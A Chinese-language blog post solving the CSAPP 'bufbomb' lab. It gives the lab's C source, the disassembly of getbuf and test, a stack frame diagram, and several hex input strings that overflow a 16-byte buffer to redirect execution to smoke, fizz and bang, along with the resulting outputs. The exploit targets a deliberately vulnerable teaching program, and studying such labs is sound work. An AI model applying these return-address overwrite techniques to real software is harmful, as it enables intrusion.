- 浏览: 74457 次
- 性别:
- 来自: 杭州
-
最新评论
csapp (《深入理解计算机系统》)一书中有一个关于缓冲区溢出的实验,其程序代码如下:
/* Bomb program that is solved using a buffer overflow attack */ #include <stdio.h> #include <stdlib.h> #include <ctype.h> #include <signal.h> #include <unistd.h> /* Signal handler to catch bus errors */ void bushandler(int sig) { printf("Crash!: You caused a bus error!\n"); printf("Better luck next time\n"); exit(0); } /* Signal handler to catch segmentation violations */ void seghandler(int sig) { printf("Ouch!: You caused a segmentation fault!\n"); printf("Better luck next time\n"); exit(0); } /* Alarm handler to catch infinite loops */ static int alarm_time = 600; void alarmhandler(int sig) { printf("Dead!: getbuf didn't complete within %d seconds\n", alarm_time); printf("Better luck next time\n"); exit(0); } /* Illegal instruction handler */ void illegalhandler(int sig) { printf("Oops!: You executed an illegal instruction\n"); printf("Better luck next time\n"); exit(0); } /* Like gets, except that characters are typed as pairs of hex digits. Nondigit characters are ignored. Stops when encounters newline */ char *getxs(char *dest) { int c; int even = 1; /* Have read even number of digits */ int otherd = 0; /* Other hex digit of pair */ char *sp = dest; while ((c = getchar()) != EOF && c != '\n') { if (isxdigit(c)) { int val; if ('0' <= c && c <= '9') val = c - '0'; else if ('A' <= c && c <= 'F') val = c - 'A' + 10; else val = c - 'a' + 10; if (even) { otherd = val; even = 0; } else { *sp++ = otherd * 16 + val; even = 1; } } } *sp++ = '\0'; return dest; } int getbuf() { char buf[16]; getxs(buf); return 1; } void test() { int val; printf("Type Hex String: "); val = getbuf(); printf("getbuf returned 0x%x\n", val); } void smoke() { printf("Smoke: You called smoke()\n"); exit(0); } void fizz(int val) { if (val == 0xdeadbeef) { printf("Fizz!: You called fizz (0x%x)\n", val); } else { printf("Misfire: You called fizz (0x%x)\n", val); } exit(0); } int global_value = 0; void bang() { if (global_value == 0xdeadbeef) { printf("Bang!: You set global_value to 0x%x\n", global_value); } else { printf("Misfire: global_value = 0x%x\n", global_value); } exit(0); } int main() { int buf[16]; /* This little hack is an attempt to get the stack to be in a stable position */ int offset = (((int) buf) & 0xFFFF); int *space = (int *) alloca(offset); *space = 0; /* So that don't get complaint of unused variable */ signal(SIGSEGV, seghandler); signal(SIGBUS, bushandler); signal(SIGALRM, alarmhandler); signal(SIGILL, illegalhandler); /* Set up time out condition */ alarm(alarm_time); test(); return 0; }
要求程序输出 Smoke!: You called smoke()
我所使用的系统环境(archlinux 2010.05, gcc 4.5.2, gdb 7.2, objdump(bintuils) 2.21):
该问题中关键的两个函数是test和getbuf,需要了解执行这两个函数的栈帧布局。
先运行
gcc -o bufbomb -g -Wall bufbomb.c
objdump -d bufbomb > bufbomb.s
这两条命令得到bufbomb.s,该文件中test和getbuf对应内容如下:
080486a6 <getbuf>: 80486a6: 55 push %ebp 80486a7: 89 e5 mov %esp,%ebp 80486a9: 83 ec 28 sub $0x28,%esp 80486ac: 8d 45 e8 lea -0x18(%ebp),%eax 80486af: 89 04 24 mov %eax,(%esp) 80486b2: e8 20 ff ff ff call 80485d7 <getxs> 80486b7: b8 01 00 00 00 mov $0x1,%eax 80486bc: c9 leave 80486bd: c3 ret 080486be <test>: 80486be: 55 push %ebp 80486bf: 89 e5 mov %esp,%ebp 80486c1: 83 ec 28 sub $0x28,%esp 80486c4: b8 ef 89 04 08 mov $0x80489ef,%eax 80486c9: 89 04 24 mov %eax,(%esp) 80486cc: e8 63 fd ff ff call 8048434 <printf@plt> 80486d1: e8 d0 ff ff ff call 80486a6 <getbuf> 80486d6: 89 45 f4 mov %eax,-0xc(%ebp) 80486d9: b8 01 8a 04 08 mov $0x8048a01,%eax 80486de: 8b 55 f4 mov -0xc(%ebp),%edx 80486e1: 89 54 24 04 mov %edx,0x4(%esp) 80486e5: 89 04 24 mov %eax,(%esp) 80486e8: e8 47 fd ff ff call 8048434 <printf@plt> 80486ed: c9 leave 80486ee: c3 ret
最左侧部分是汇编指令的内存地址,其中与 printf("getbuf returned 0x%x\n", val); 这一句对应的汇编语句为:
80486e1: 89 54 24 04 mov %edx,0x4(%esp) 80486e5: 89 04 24 mov %eax,(%esp) 80486e8: e8 47 fd ff ff call 8048434 <printf@plt>
其中的printf指令地址为0x080486e8,由于intel处理器采用小端法表示,所以实际表示为e8860408
执行gdb bufbomb命令,在getbuf函数设置断点(用break getbuf)
执行run命令,程序跳转至getbuff,然后用info reg查看寄存器内容,得到ebp值为0xbffeffb8
根据上面的反汇编结果可以知道,调用getbuf函数时的栈帧(假设是地址从高向低排列)表示如下:
---------------
-----------------
---------------
getbuf 返回地址
----------------
ebp
------------------
暂为空
-----------------
暂为空
----------------
buf[12]-buf[15]
----------------
buf[8]-buf[11]
----------------
buf[4]-buf[7]
----------------
buf[0]-buf[3]
-----------------
在从getbuf返回后,我们要求输出smoke函数内容,即将smoke的返回地址(0x080486ef,即ef860408)压入到getbuf所在地址处。因为smoke函数没有函数参数,所以不需要多余的处理.
接着运行bufbomb程序,提示输入字符串,我输入的字符串为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf ef 86 04 08
输出结果为:Smoke: You called smoke()
其中前面24个字节为空(其实这些内容可以为任意值),接下来是ebp地址,它需要保持原来的内容。再然后是smoke函数的返回地址。
现在还没有完全完成所有的实验,还可以将返回地址设为fizz或者bang函数,然后也可以得到不同的输出结果。
例如,如果输入字符串为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 0d 87 04 08 ,此时得到输出结果为:Misfire: You called fizz (0xb773bff4)
如果输入字符串为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 0d 87 04 08 ef be ad de ef be ad de
可以得到输出结果为:Fizz!: You called fizz (0xdeadbeef)
这个例子中使用了fizz的返回地址(0x0804870d,可以在上面的反汇编代码中找到fizz标记左侧的地址即是,还有fizz的形参的内容不做修改和修改为0xefbeadde时 的情况)
如果输入字符串为:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 52 87 04 08 ,得到输出结果为Misfire: global_value = 0x0
如果输入字符串为00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 64 87 04 08 ,得到输出结果为Bang!: You set global_value to 0x0
这个例子是直接跳转到bang的返回地址(0x08048752)或者printf(“Bang!: You set global_value to 0x0")语句对应汇编语句的首地址(0x08048764)
参考链接:
buffer overflow on wikipedia
发表评论
-
最小c编译器
2011-11-08 14:09 1552最小c编译器(来源 (最好在linux下操作))代码有好几个 ... -
the development of c language(转)
2011-11-08 09:25 1428c语言之父Dennis Ritchie 写的关于c语言开发历 ... -
C语言,你真的弄懂了么?
2011-11-07 12:42 1804程序(来源 ): #include <stdi ... -
pe文件格式实例解析
2011-11-07 10:05 0环境:windows xp 速龙3000+(即x86兼容32位 ... -
小型elf "Hello,World"程序
2011-11-06 23:59 1404参考链接:http://timelessname.com/el ... -
elf文件格式实例解析
2011-11-05 23:00 6411试验环境:archlinux 速龙3000+(即x86兼 ... -
高质量的c源代码
2011-11-03 10:18 1223现在自由软件及开源软件越来越流行,有大量的附带源程序 ... -
fltk 库
2011-09-26 19:47 1889fltk是一个小型、开源、支持OpenGL 、跨平台(win ... -
《Introduction to Computing Systems: From bits and gates to C and beyond》
2011-09-25 23:33 2231很好的一本计算机的入门书,被很多学校采纳作为教材,作者Yale ... -
the blocks problem(uva 101 or poj 1208)
2011-09-11 20:57 1858题目描述见:uva 101 or poj 1208 ... -
the blocks problem(uva 101 or poj 1208)
2011-09-11 20:56 0题目描述见:uva 101 or poj 1208 ... -
部分排序算法c语言实现
2011-09-02 14:51 1039代码比较粗糙,主要是用于对排序算法的理解,因而忽略了边界和容错 ... -
编译器开发相关资源
2011-08-31 08:40 1244开发编译器相关的一些网络资源: how difficu ... -
zoj 1025 Wooden Sticks
2011-07-23 20:25 986题目见:zoj 1025 先对木棒按照长度进行排序,然后再计 ... -
zoj 1088 System Overload
2011-07-23 17:30 1191约瑟夫环 (josephus problem )问题, ... -
zoj 1091 Knight Moves
2011-07-23 09:05 871题目见zoj 1091 使用宽度搜索优先来求解, ... -
zoj 1078 palindrom numbers
2011-07-22 19:31 1169题目见zoj 1078 主要是判断一个整数在基数为2 ... -
zoj 1006 do the untwist
2011-07-22 13:24 960题目见zoj 1006 或poj 1317 简单 ... -
zoj 3488 conic section
2011-07-22 12:23 1040题目见zoj 3488 很简单的题目,却没能一次搞定,因 ... -
zoj 1005 jugs
2011-07-22 11:43 876题目内容见zoj1005 由于A,B互素且A的容 ...
相关推荐
### 缓冲区溢出实验:中科大csapp实验3 bufbomb #### 一、实验背景及目的 在计算机安全领域,缓冲区溢出是一种常见的攻击手段,它利用程序对缓冲区边界检查不严格的问题来执行恶意代码或篡改程序运行状态。本实验...
本次实验基于《Computer Systems: A Programmer's Perspective》(简称CSAPP)教材中的一个重要实验项目——bufbomb实验。该实验旨在帮助学习者深入理解IA-32架构下的函数调用机制与栈结构,并通过实践操作加深对...
### CSAPP Lab3 实验指导说明 #### 一、实验背景与目的 本实验是针对CSE351课程的一项重要任务,旨在帮助学生深入了解x86-64处理器上的调用栈组织,并通过一系列缓冲区溢出攻击来增强对程序运行时操作的理解。通过...
《深入理解计算机系统》(Computer Systems: A Programmer's Perspective, 简称CSAPP)是一本广受欢迎的教科书,其中的实验题“bufbomb”是一个经典的缓冲区溢出攻击练习。本篇文章将详细解析如何解答“bufbomb”...
【标题】"buflab-handout, csapp lab3" 是一个计算机科学相关的实验,源自《计算机系统:从程序员的视角》(Computer Systems: A Programmer's Perspective,简称CSAPP)第二版的实验3。这个实验通常关注于软件安全...
- **实验背景**:本实验基于原卡纳基梅陇大学开设的《计算机系统架构》(CSAPP)课程进行改编。 - **实验章节**:本次分享的是该系列实验中的第四章。 - **实验类型**:验证型实验 - **实验目的**: - 理解C语言...